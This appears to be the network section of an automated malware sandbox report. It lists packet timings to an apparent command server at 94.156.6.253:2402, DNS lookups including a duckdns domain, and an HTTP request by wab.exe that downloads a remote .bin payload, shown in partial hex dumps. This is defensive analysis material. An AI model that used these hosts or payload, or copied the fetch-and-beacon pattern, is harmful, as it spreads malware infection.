                                                                                                                                                                                        Oct 30, 2023 14:17:54.337148905 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337210894 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337256908 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337291956 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337318897 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337395906 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337462902 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337526083 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337587118 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337663889 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337800026 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337804079 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337894917 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337960958 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338027000 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338076115 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338103056 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338188887 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338258028 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338258028 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338346004 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338375092 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338447094 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338516951 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338571072 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338593960 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338680983 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338754892 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338845015 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.376534939 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.376585960 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.376626015 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.376666069 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.376916885 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.554419041 CET8050096178.237.33.50192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.554649115 CET5009680192.168.11.20178.237.33.50
                                                                                                                                                                                        Oct 30, 2023 14:17:54.574955940 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.575030088 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.575087070 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.575139999 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.575191975 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.575395107 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.575874090 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.575946093 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.576015949 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821211100 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821264982 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821317911 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821327925 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821456909 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821487904 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821594000 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821651936 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821671963 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821736097 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821796894 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821814060 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821877956 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821934938 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821980953 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822000027 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822076082 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822124958 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822138071 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822210073 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822264910 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822304964 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822334051 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822369099 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822424889 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822493076 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822551012 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822575092 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822624922 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822638988 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822715998 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822777987 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822786093 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822860956 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822922945 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822982073 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.823071957 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825191975 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825265884 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825321913 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825377941 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825433016 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825445890 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825515032 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825532913 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825613022 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825669050 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825726986 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825831890 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825881958 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825901031 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825979948 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826040983 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826100111 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826127052 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826184034 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826205969 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826268911 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826333046 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826373100 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826405048 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826476097 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826503038 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826559067 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826623917 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826684952 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826689959 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826767921 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826828003 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826864004 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826900959 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826965094 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827019930 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827029943 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827075005 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827115059 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827182055 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827236891 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827246904 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827320099 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827322006 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827397108 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827454090 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827507019 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827519894 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827589035 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827635050 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827657938 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827733040 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827778101 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827804089 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827878952 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827939034 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827958107 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828042030 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828135967 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828139067 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828213930 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828219891 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828296900 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828357935 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828417063 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828475952 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828479052 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828530073 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828561068 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828622103 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828639984 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828716040 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828774929 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059546947 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059602022 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059715986 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059756041 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059788942 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059858084 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059870958 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.059946060 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.060005903 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.060106039 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:55.060117960 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.060168028 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:55.060223103 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.060275078 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:55.060301065 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.060375929 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.060430050 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.060456038 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:55.060503006 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:55.060782909 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:56.449378014 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:56.449556112 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:59.014291048 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:59.251811981 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:59.251859903 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:59.251945972 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:59.252002954 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:59.252172947 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:59.254100084 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:59.254162073 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:59.489383936 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:59.489448071 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:59.489564896 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:59.496356010 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:59.496511936 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:18:06.594631910 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:18:06.597311974 CET500942402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:18:06.887963057 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:18:37.298826933 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:18:37.300952911 CET500942402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:18:37.591021061 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:19:08.087601900 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:19:08.090003967 CET500942402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:19:08.388150930 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:19:38.361813068 CET5009680192.168.11.20178.237.33.50
                                                                                                                                                                                        Oct 30, 2023 14:19:38.429027081 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:19:38.869733095 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:19:38.871763945 CET500942402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:19:38.986676931 CET5009680192.168.11.20178.237.33.50
                                                                                                                                                                                        Oct 30, 2023 14:19:39.169465065 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:19:39.174156904 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:19:40.220698118 CET5009680192.168.11.20178.237.33.50
                                                                                                                                                                                        Oct 30, 2023 14:19:40.673769951 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:19:42.673310041 CET5009680192.168.11.20178.237.33.50
                                                                                                                                                                                        Oct 30, 2023 14:19:43.657494068 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:19:47.578598976 CET5009680192.168.11.20178.237.33.50
                                                                                                                                                                                        Oct 30, 2023 14:19:49.625041962 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:19:57.388964891 CET5009680192.168.11.20178.237.33.50
                                                                                                                                                                                        Oct 30, 2023 14:20:01.544282913 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:20:09.593885899 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:20:09.596127987 CET500942402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:20:09.888312101 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:20:17.009545088 CET5009680192.168.11.20178.237.33.50
                                                                                                                                                                                        Oct 30, 2023 14:20:25.367176056 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:20:40.363724947 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:20:40.368549109 CET500942402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:20:40.669166088 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:21:11.172322035 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:21:11.174462080 CET500942402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:21:11.466244936 CET24025009494.156.6.253192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 30, 2023 14:17:48.396938086 CET | 59250 | 53 | 192.168.11.20 | 1.1.1.1
Oct 30, 2023 14:17:49.283382893 CET | 53 | 59250 | 1.1.1.1 | 192.168.11.20
Oct 30, 2023 14:17:51.974205017 CET | 65069 | 53 | 192.168.11.20 | 1.1.1.1
Oct 30, 2023 14:17:52.148176908 CET | 53 | 65069 | 1.1.1.1 | 192.168.11.20
Oct 30, 2023 14:17:52.904098034 CET | 49255 | 53 | 192.168.11.20 | 1.1.1.1
Oct 30, 2023 14:17:53.035227060 CET | 53 | 49255 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 30, 2023 14:17:48.396938086 CET | 192.168.11.20 | 1.1.1.1 | 0xb0dd | Standard query (0) | gudanidevelopment.ge | A (IP address) | IN (0x0001) | false
Oct 30, 2023 14:17:51.974205017 CET | 192.168.11.20 | 1.1.1.1 | 0xc438 | Standard query (0) | ourt2949aslumes9.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 30, 2023 14:17:52.904098034 CET | 192.168.11.20 | 1.1.1.1 | 0xc879 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 30, 2023 14:17:49.283382893 CET | 1.1.1.1 | 192.168.11.20 | 0xb0dd | No error (0) | gudanidevelopment.ge | | 217.147.225.69 | A (IP address) | IN (0x0001) | false
Oct 30, 2023 14:17:52.148176908 CET | 1.1.1.1 | 192.168.11.20 | 0xc438 | Name error (3) | ourt2949aslumes9.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2023 14:17:53.035227060 CET | 1.1.1.1 | 192.168.11.20 | 0xc879 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                        • gudanidevelopment.ge
                                                                                                                                                                                        • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.11.20 | 50093 | 217.147.225.69 | 80 | C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp | kBytes transferred | Direction | Data
Oct 30, 2023 14:17:49.596832991 CET | 14 | OUT | GET /IogvoayYhe139.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Host: gudanidevelopment.ge
Cache-Control: no-cache
Oct 30, 2023 14:17:49.904386997 CET | 15 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Oct 2023 13:17:49 GMT
Server: Apache
Last-Modified: Thu, 26 Oct 2023 08:16:56 GMT
Accept-Ranges: bytes
Content-Length: 494656
Cache-Control: s-maxage=10
Content-Type: application/octet-stream
                                                                                                                                                                                        Data Ascii: 4jl .T!$Hm[!=`Wncy}2zo2{QkF~P&{\b'<>[Tbwu}>r!1{anvE%-8Skx(zGVzRb!^5d!xfTRa23`1&zG>]`1}[Z0pBw}vo|)<{d0{<
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905550003 CET22INData Raw: 6d e1 10 05 15 f7 db eb 49 1e f4 fc 9e 07 94 4f 3b 39 b8 d4 54 5d 71 c0 f0 e6 a6 04 ac be ba b9 8a b7 5d 63 f6 ca 33 8b ff 46 2a 10 71 a4 4d 80 80 77 ed fa 56 bd d5 58 17 c4 89 76 26 3a 80 37 ca 96 a6 5f bd ea 79 2d 4d 1c 05 89 c0 05 ba ca 14 e1
                                                                                                                                                                                        Data Ascii: mIO;9T]q]c3F*qMwVXv&:7_y-M"/'Ys+o5 WlNsw[1f}>_ejE3u013|ffUk\((khas}-$_8b{qv;*9?ox"
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905659914 CET24INData Raw: ac d4 4c d0 9d 46 d3 04 ea 57 0c df 72 81 64 04 a7 50 ed cc 03 fb 64 78 ab 84 e7 ec fb e5 c6 b4 76 76 a9 8d 14 36 a9 be 0a 7d 53 8b bb 13 c7 86 2d ec 66 83 3b fa f1 b9 cb 89 46 29 83 40 4f 35 81 ae 56 45 26 25 eb e9 0c db c7 f1 ec 71 c7 3f 3c 7e
                                                                                                                                                                                        Data Ascii: LFWrdPdxvv6}S-f;F)@O5VE&%q?<~(M crqyn1dEIdb#qN#~51^_*\iX&9knJBP\%a`g+ESRs`AoDQi<LY$(mmrVPX=U
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905760050 CET25INData Raw: db 2a 49 a5 e9 17 80 12 3d 74 a2 bf b4 0c c9 96 45 0c b7 c8 89 20 1d c1 0d cf be b4 88 f5 55 59 0f 9b c0 a5 6c 2a 45 d6 e7 fb 07 b3 cf 9b d9 b4 b1 45 30 7b 8b 50 83 ea 87 e5 32 cf 39 46 8d d8 67 09 bb 7d 12 27 9e 2f a1 06 c7 ed c1 7b 05 b6 e8 a6
                                                                                                                                                                                        Data Ascii: *I=tE UYl*EE0{P29Fg}'/{g+Z9rdtjygz8dA`*QCB/$Gz{KXZz]hf3B)Y@U;I}t =ML4u-t_ZCDE%_^d8Rd
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905874968 CET26INData Raw: 18 45 07 35 c0 8b 53 8e fc 60 07 4c ba ad 8b 71 c8 54 db 68 a6 60 9e 69 dd 76 88 7f 1a 67 4c 20 43 5c 98 35 6e 1e 93 c3 68 ea 67 34 b1 2a 0f 62 6d bf 6d 44 00 27 10 49 e8 82 ce 7b d4 58 c0 66 80 89 41 d1 a1 46 0c 1a b5 55 5a e2 2d 11 55 48 e7 78
                                                                                                                                                                                        Data Ascii: E5S`LqTh`ivgL C\5nhg4*bmmD'I{XfAFUZ-UHxn2*6Peg!2$l7CQhO%+< ,G}@PHV(!BsG_Iuq|m~i[7|l%6g-x^C6[68^='v
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905976057 CET28INData Raw: 7d 33 d8 58 67 ba 45 07 94 61 6b be ea d7 b1 6b 33 72 eb 0f 87 c6 32 76 1f 9f 88 ec 73 97 e7 40 6d a7 83 7f ff a4 17 34 ee 75 ab f8 8d ad 9d e3 52 17 91 ca 35 70 26 c1 77 51 c9 71 61 b3 02 0e e7 33 d4 5c a5 17 2c 61 41 0c 6d c8 56 ae 6d 9d 16 e5
